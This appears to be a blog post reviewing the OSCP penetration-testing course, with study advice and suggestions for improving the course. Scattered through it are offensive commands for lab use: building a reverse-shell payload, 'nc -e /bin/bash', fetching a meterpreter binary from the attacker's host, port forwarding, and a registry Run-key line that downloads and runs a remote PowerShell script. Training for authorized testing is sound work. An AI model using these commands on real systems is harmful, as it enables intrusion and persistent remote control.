Offensive Security Certified Professional Part 2

Where the course was great, and where it wasn't

23 April 2016

This is the second in a series of posts about the OSCP certification and my journey to acquire it. This post offers a post-graduate viewpoint: some commentary on the experience and some constructive criticism of the course. If you don’t know about the course, please have a look at part 1.

Reading about the PWK course, if you’re like me, was an intimidating experience. I have the habit of always shortchanging myself when comparing what I know and can do against what I think others can do. It was exciting, but it was also “can I really do all this?”

Now that I have the certificate framed in my office, obviously the answer was “yes.” But it would have bolstered my courage a little to read some criticism of the course, to know that it is defeatable.

I genuinely believe Offensive Security is publishing the best program they can, and their numerous other works and contributions to the field of information security can’t be overstated. Without Kali Linux, we’d have a less organized field of probably lesser alternatives. Without exploit-db.com we would have to range all over a smattering of GitHub pages, blog posts, CVE references and FSM-knows what else to find proof of concept exploit code. I think the Google Hacking Database is overshadowed by sh0dan, but it is nonetheless a great resource.

All that said, the course has some bad points. I don’t claim to have all the answers, but I’ll note what I think could be improved and how.

I’m also going to address some of the weirder “tribal wisdom” I’ve seen in posts, IRC, etc. These are differences in opinion, and again aren’t counter-assertions intended to tell people they’re wrong.

30 days is probably not a great idea or “how to make your wife very angry with you”

I’ve seen a couple of people in the IRC #offsec channel over time talk about using the 30 day option for the course enrollment. Sometimes it’s a matter of scheduling, sometimes it’s a matter of hubris, sometimes it’s a matter of just not understanding how brutal this course can be to your free time and relationships. I’ve read some pretty sad things in various places about the strain it puts on students and their significant others.

One gentleman in particular, who goes by ‘unfo-‘ in the #offsec channel, was open enough about his experience with the PWK course to post a series of YouTube videos and write-ups about his progression on a 30 day schedule. The culmination of that experience, unfortunately, was a failure on his first OSCP exam attempt.

I myself “gambled” against my nature in a way, and went for the 60 day option when part of me thought, conservatively, that I should do the 90 days. Looking back, I probably would have breached all the machines given 90 days’ time, as I was only about 8-9 machines short of that, with about 25 days spent purely on lab work. However, your likelihood of passing the exam is not strongly tied to your “kill count” in the lab. As OffSec themselves say in a forum FAQ entry:

Do I need to get every machine in the lab to do the exam?

No. The machines in the lab are there to give you as much experience as possible before you take the exam in order to better prepare you.

My suggestion is this: Take as long as you think you’ll need to understand the material in the syllabus. In fact, if your schedule allows it, study ahead of time the things that you don’t know. It’s what I did. The exam really does emphasize the course material, not the lab machines.

I feel bad for folks who are pushed into the 30 day option by scheduling conflicts or other constraints, because it leaves them without a strong chance of passing the exam. I wonder what the purpose of the 30 day option even is. My best guess is that it allows already-seasoned industry vets to pick up the cert with a minimum of time investment.

On the other hand, might that not be better served by simply allowing anyone to take the exam? The OSCE course, Cracking the Perimeter, actually has a pre-test to screen out folks who aren’t ready for it, and I think something like that could be implemented for OSCP. Pass a screening exam, and you get one attempt without first completing PWK. Fail that screening, and you take the course normally.

And on a more personal note, try not to do this course while your wife is pregnant. Or worse, with a newborn! I’ve lost count of how many times I’ve read “my wife was 9 months along when I scheduled my exam.” Seriously? I know everyone has their own circumstances, but goodness if you aren’t making things even harder on yourself by making this choice.

“Don’t rely on MSF”

So, there’s a strong sentiment I see frequently. It goes “I can’t use the Metasploit Framework (MSF) on the exam, so I’m not going to rely on it!” The implication being that the student will reinvent a lot of wheels instead of leveraging existing, polished tools.

This confuses me, and I wanted to talk about it.

First, some explanation for those who don’t know: the MSF has a couple of different contexts, because it is both a tool and a repository of exploit code and modules. This distinction is important.

OffSec restricts the modules you may use on the exam. Basically, they want you to prove you know the material by going through the motions of more “manual” exploitation and (more importantly) privilege escalation. The MSF makes certain tasks very very easy. ‘Too easy’ for the context of an exam. Hence the restrictions.

However, the MSF is also a tool, and it enormously improves the quality of life of the penetration tester when working with a remote compromised system. The msfvenom and meterpreter binaries in particular are things you should be very familiar and comfortable with. Spawning remote shells from inside a meterpreter session is so valuable that I can’t overstate it. Using the portfwd command is crucial on several lab hosts to gain full privileges. Lateral movement in Windows domains is much improved with post modules. Workspaces keep your sessions, loot and artifacts organized.
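As a concrete illustration (the payload, ports and filenames here are my own placeholders, not anything prescribed by the course), generating a meterpreter binary and then forwarding a port through a compromised host looks roughly like this:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my_kali_IP> LPORT=4444 -f exe -o met.exe

and then, from inside an established session,

meterpreter > portfwd add -l 3389 -p 3389 -r <internal_target_IP>

which makes RDP on an otherwise unreachable internal host answer on your local port 3389.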

And out in the real world, working with other penetration testers, there aren’t (usually) restrictions on what you may do. The full breadth of the framework is at your disposal. If you graduate from the course without a solid mastery of MSF, you have really shortchanged yourself.

One more thing of note.

I realize that nc/socat/ncat are used frequently in the course guide when doing elementary remote connections to hosts. nc -e /bin/bash is a real thing. However, my experience and habit working in the lab was that if there was a possibility of removing nc from the killchain, I took it every time, usually with a meterpreter binary. But I’ve noticed a sort of predisposition to keep using nc as an interlocutor for shells when it’s usually not required or even beneficial.

Sure, an exploit might have a nc -lp listener as the usual catcher, but in those cases the first thing I did was

wget http://<my_kali_IP>/meterpreter.bin

or some variant.

Okay. That’s a lie. The first thing I did was swear at sh and

python -c 'import pty; pty.spawn("/bin/bash")'
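For completeness, the catcher on the Kali side of that meterpreter swap is a multi/handler rather than an nc listener. Something like this (payload and port are assumptions; match them to whatever you built with msfvenom):

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST <my_kali_IP>; set LPORT 4444; run"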

Try Harder, but process counts too

If you ask for help in #offsec or on the forums, you’re asking in the wrong place first of all. But if you do, you’ll likely hear a riff on ‘try harder.’

I have more ideas about balancing ‘try harder’ with learning below, but here’s the real deal.

I would say that most of my ‘try harder’ moments in the lab came down to either not enumerating the right ‘clue’ to move forward, or encountering something that I didn’t know was possible.

For example, did you know that .cgi files contain arbitrary scripts? Bash? Check. Perl? Check. Python? Check.

Well, I didn’t know. And it caused me no end of grief on one linux host in the lab. That box cost me more time than ‘pain’ did, by far. It wasn’t until I was researching how the relevant application worked that I discovered this fact. Once I knew, it was easy to move forward.
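If you’ve never run into one either: a CGI “script” is just an executable the web server runs, in whatever language its shebang line points at, with the output sent back as the HTTP response. A contrived bash example (not the lab host’s actual file) is all of this:

#!/bin/bash
echo "Content-type: text/plain"
echo ""
id

If you can write or overwrite a file like that, you have code execution as the web server’s user.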

So simple ignorance kept me out of some boxen for a long time. Usually the culprit was simple under-enumeration though. nmap is what folks tend to think of, but nikto, dirbuster, onesixtyone, enum4linux and others provide individual pieces of information that in aggregate unlock hosts. Paying attention to details and learning what matters and what doesn’t is basically the entire point of the lab. Sure, there’s learning proxychains and some bespoke tools, but none of that matters if you can’t enumerate your environment accurately, quickly and comprehensively.
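To make that concrete, my chains looked something like this, with placeholders for the target, and each follow-up tool only run if the scan before it gave me a reason to:

nmap -sS -sV --open <target>
nmap -sU -p 161 --open <target>

nikto -h http://<target>/ (only if 80/443 turned up)
enum4linux -a <target> (only if 139/445 turned up)
onesixtyone <target> public (only if 161/udp turned up)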

In other words, Process. Process gets you root.

Try Harder is good and all, but you need to try harder where it counts: your ignorance. That’s my takeaway. If you just slam your head harder into a problem, you waste time, brain power and stamina. Be aware, be picky.

Despair

Oh man.

The first week of my lab time, I sucked. Bad.

I had a lot of pressures on me during the course. I had a daytime gig that fortunately was very flexible about my work “shifts” and so that wasn’t too bad. But launching 0meta Security as a whole, the people, the knowledge, the investment, hinged upon me acquiring my OSCP. It is both enabler and fallback plan. Multiple individuals had time and investment tied up in the company. I basically couldn’t afford to fail the course.

I didn’t really have any troubles moving through the PDF, and once I got to the end I was feeling pretty good!

And then other than a couple of essentially freebie hosts, I couldn’t pop anything.

I made a mistake that OffSec warns you about, which is

Don’t go in order of IPs when moving through the lab. Go for the lowest-hanging fruit first, then move on to more difficult hosts.

Naturally, with my inflated sense of ego, I ignored that sage advice and…“had a bad time”, as they say on the interwebz.

I felt not only worthless, but also that my enormous investment in skills over the past 2 years was basically for naught. I was a pretty miserable person to be around too. I was in a very depressed state and lashed out at myself verbally in an immature manner.

I’m being frank here because I feel that it’s important. I didn’t give up (not that I felt I could, but still), and I kept at it until I started ‘getting it.’ I can remember the box I was working on when I had my first real success at rooting a host where I knew nothing about the application I was attacking beforehand. From ground floor to the top, by research and experimentation.

Yeah, it felt good, but that wasn’t really the point. The progress on process was what mattered. Truly understanding the cycle of enumeration and testing/research is what propelled me forward through the rest of the lab time.

But the despair was real.

Day 1 labs

No. Don’t. Just don’t.

There are a couple of exceptions, I suppose. If you really are already employed as a penetration tester, you can probably just jump in and start rooting.

If you aren’t though, if you’re starting from square one, please don’t. I read all the time about students getting discouraged (like I did above); when they’re asked how much of the PDF they’ve read and how many exercises they’ve completed, the answer is usually:

A few chapters…

No, you’re getting ahead of yourself. Let me phrase it this way:

If jumping straight into the labs was the best way to go forward, there probably wouldn’t be a PDF, and OffSec would outright recommend it.

Notably, they don’t do this. They created the course as a sum of all the parts, not just a jumble of virtual hosts and a few networks strung together. If that’s all you wanted, there are free alternatives.

Automate all the things!…not!

A couple of other reviews of OSCP and PWK recommend that students automate the enumeration cycle to the furthest extent they can.

I do not do this, though I won’t go so far as to condemn it. I want to assert that it isn’t required in the least to do well in the labs or pass the exam. In actual engagements, excessive automation can be a liability.

Remember, PWK teaches penetration testing, the purpose of which is to test. With real systems, real networks, no reverts, IDS, honeypots, packet-inspecting firewalls.

There’s no point in running onesixtyone in a script with nmap when there were no SNMP services running on any hosts. If your automation accounts for that, good job! Otherwise, you just wasted time. And made more noise on the network. And cluttered up your log output.

My process for enumeration starts with one tool, and moves to the next only based on the results of the tool I just ran. I deliberately choose every packet that leaves my interface. Not a blizzard of

nmap -sS -A -p- -Pn -T5 <some poor sap's IP>

What is just killer is if you kick off some grand scan of the universe, but you typo’d something and now you’re scanning out of scope. Especially if your grand scan uses nmap’s scripting engine. And you’re like, hey, let’s turn on unsafe scripts because otherwise I can’t get smb-check-vulns to return real results!
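In other words, something like this pointed at a range you fat-fingered (a made-up illustration, not a command from the course):

nmap -p 445 --script smb-check-vulns --script-args unsafe=1 <typo'd scope>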

Bad move. Bad day.

The ‘rabbit hole’ misconception

I spent too long/5 hours/a day on a rabbit hole. Ugh

Rabbit hole carries a negative connotation of “I wasted time on something that doesn’t matter.” I certainly understand the feeling.

Remember though, rabbit holes aren’t always negative! If you didn’t follow good process then yeah, it was probably bad. On the other hand, I learned about the veil framework by going down a rabbit hole on a host, because some of the information on it suggested that antivirus evasion would play a role in getting exploits to execute. If you traversed a rabbit tunnel, even if it did end up bottoming out, try to keep track of what you learned getting to the end. And more importantly, how to avoid that hole in the future!

Criticisms

Proof files are useless, give them meaning

This is a tangled subject, because it has to do with how people learn, how the course is architected, and OffSec’s goals and principles.

Research is important, incredibly so in the information security space. You’ll never know everything, you’ll never be great at all of it, it moves very quickly, etc. We’ve all heard it before. It’s OffSec’s job to instill in students the pivotal understanding that ‘discovering answers on your own’ is the basic assumption in infosec. At least, if you want to be like Dan, or HD, or Mikko.

At some point though, you have to teach. You have to teach the error in process that leads to a student banging their head and not getting anywhere. This is a lab, and it’s literally the only environment where these people can learn process.

As a result of pressure or frustration, students ask for help in IRC, or out of channel, and they get help in ways that don’t help them. You’re supposed to ask admins for help, because they are the best at giving hints that don’t spoil the host or challenge. However, out of the spirit of camaraderie, students will invariably cooperate out of sight of administrators. There needs to be a more formalized system to address this.

“But! Out in the real world, there aren’t hints and help files!”

That is correct, of course. It’s also facile because in the real world, you have mentors and peers. If you don’t know what to do, you almost certainly will be working in an environment where you can turn to your peer and ask “hey, have you seen this before?”

Recognition of this is important. Penetration tests at the highest levels are team efforts. Exactly because no one is great at everything. I’m personally bad at webapps and great at privilege escalation. You’re probably different. We all have strengths and weaknesses.

To get better, to meet what you might think of as an “acceptable minimum” though, you really need to get your process refined.

I look at the proof.txt files from the labs as wasted potential. They’re treated as trophies currently. You include them in a report that you don’t actually have to submit. Students get hung up on them with questions like:

“I can read this proof.txt even though I don’t have a shell. Am I done with the box?”

The newest exam setup actually uses proof.txt files from exam hosts during submission of results, directly in a control panel, which wasn’t the case during my exam. Other than that…nothing. Waste.

I think we can solve three problems with one stone here, by allowing hints to lab hosts to be “dispensed” from a system in the control panel in return for proof.txt files.

The particulars, like the nature of the hints (do we give the whole solution, just the first “step,” or something in between?), how much the hints “cost,” whether certain hosts are “hintable” or not, and so on, are just details. The point is that as students legitimately breach hosts and refine their process, they acquire the ability to get fixed, narrow help only where needed, and only in return for ‘trying harder.’ They can see where they’re missing enumeration, or where they didn’t research a service or application enough. Where their privilege escalation script is letting them down. Good students will take advantage of a system like this to enhance their process.

This also gives students “plenty of rope to hang themselves with,” as the saying goes. Meaning, if they cheat and harvest hashes from other sources, they are actively making the choice to sabotage their learning, and it isn’t OffSec’s problem if they don’t pass the exam.

It’s my sincere belief that a system like this would do a lot of good, if handled properly. I hope it comes to pass, as it will make the course even better.

Practicing persistence

The edgiest moment I have right after firing an exploit is waiting for the scripted meterpreter commands to find a stable home for my meterpreter process.

The second edgiest moment is establishing persistence.

Working with persistence is really important in penetration testing. Machines get rebooted, employees turn their workstations off, or laptops go to sleep, etc. You may not have a long time to figure out what situation you’re in. Making sure you can re-establish your connection is the first thing you should be doing in nearly all cases.

In the lab, this is essentially impossible to experiment with, since a VM can be reverted at any moment. Sure, you can use the Win7 host you get access to for the course to practice Windows persistence. However, the VM also has an auto-shutoff function that is easy to accidentally turn into a full revert of the host if you aren’t careful. Obviously this doesn’t help you with Linux, FreeBSD, or OS X either.

I think at the least, the course PDF should include much more information on persistence. The Metasploit Unleashed book contains a section on persistence, but only in the context of the meterpreter service, which is generally undesirable as a foothold because it writes a binary to disk. Going over advanced persistence avenues like registry-embedded scripts (which aren’t binaries and typically don’t trigger AV), powershell scripts (again, not binaries), or attacking firmware to embed services would be really nice additions.
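To give a flavor of what I mean, here’s the classic registry-plus-PowerShell version of it (my own contrived command using a hypothetical persist.ps1 hosted on the attacking machine, not something from the course materials):

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://<my_kali_IP>/persist.ps1'))"

Nothing but a registry value lands on disk, the script runs in memory at each logon, and whether AV notices depends entirely on what’s in persist.ps1.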

As it is, I had to figure this stuff out on my own afterwards, using the lab setup I’ll talk about in part 3.

Post-graduate Services

I think most alumni would agree that the lab access is what we “miss” about the course. It’s well-curated and extensive.

In the “post-graduate services” category, I’d pay a smallish yearly fee in order to have access to “beta testing” new lab machines, or to help refine course materials in general. I think it would be a cool way to involve OSCP holders. OffSec doesn’t require continuing education credits to maintain an OSCP or OSCE (which is the right move, btw), but it would be a neat way to maintain the relationship between the organization and the certification holders, while generating income that could be recycled back into the course.

Put Retired Lab Machines on Vulnhub

If you weren’t aware, vulnhub is a repository of so-called “boot2root” virtual machines. Pop them into VirtualBox and attack them just like lab machines. They vary in difficulty, from say…‘kraken’ to probably Humble or worse.

Some teach specific techniques, like webapps, using password bruteforcers, evading IDS counter-measures, etc. Others are just ‘follow the breadcrumbs’ like a fair number of OffSec lab machines are.

I think it would be really neat for OffSec to publish old/retired lab hosts as packages on vulnhub. Let these hosts continue to educate even when they aren’t cutting edge or super-relevant anymore for the course itself.

Not Enough Active Directory Shenanigans

There are only a very small number of computers in the lab that actually matter for working with Active Directory. Breaching them is a matter of pivoting and enumeration techniques that you can only begin once you find and attack the right ‘first’ host.

I was hoping for more in this vein. In my opinion, it would be best to have a whole “network” dedicated to working with AD, and using various skills to exploit SMB, authentication, Kerberos Golden Tickets, etc. It’s so important for penetration testers to have a solid grasp of these skills that I’m surprised more time isn’t devoted to talking about them.

That wraps up the second part in this series. Part 3 will talk about helpful techniques, tools, and procedures to make your time in the lab, and afterward, more enjoyable.

Thanks for reading.


by:
0meta Staff

(blog@0metasecurity.com)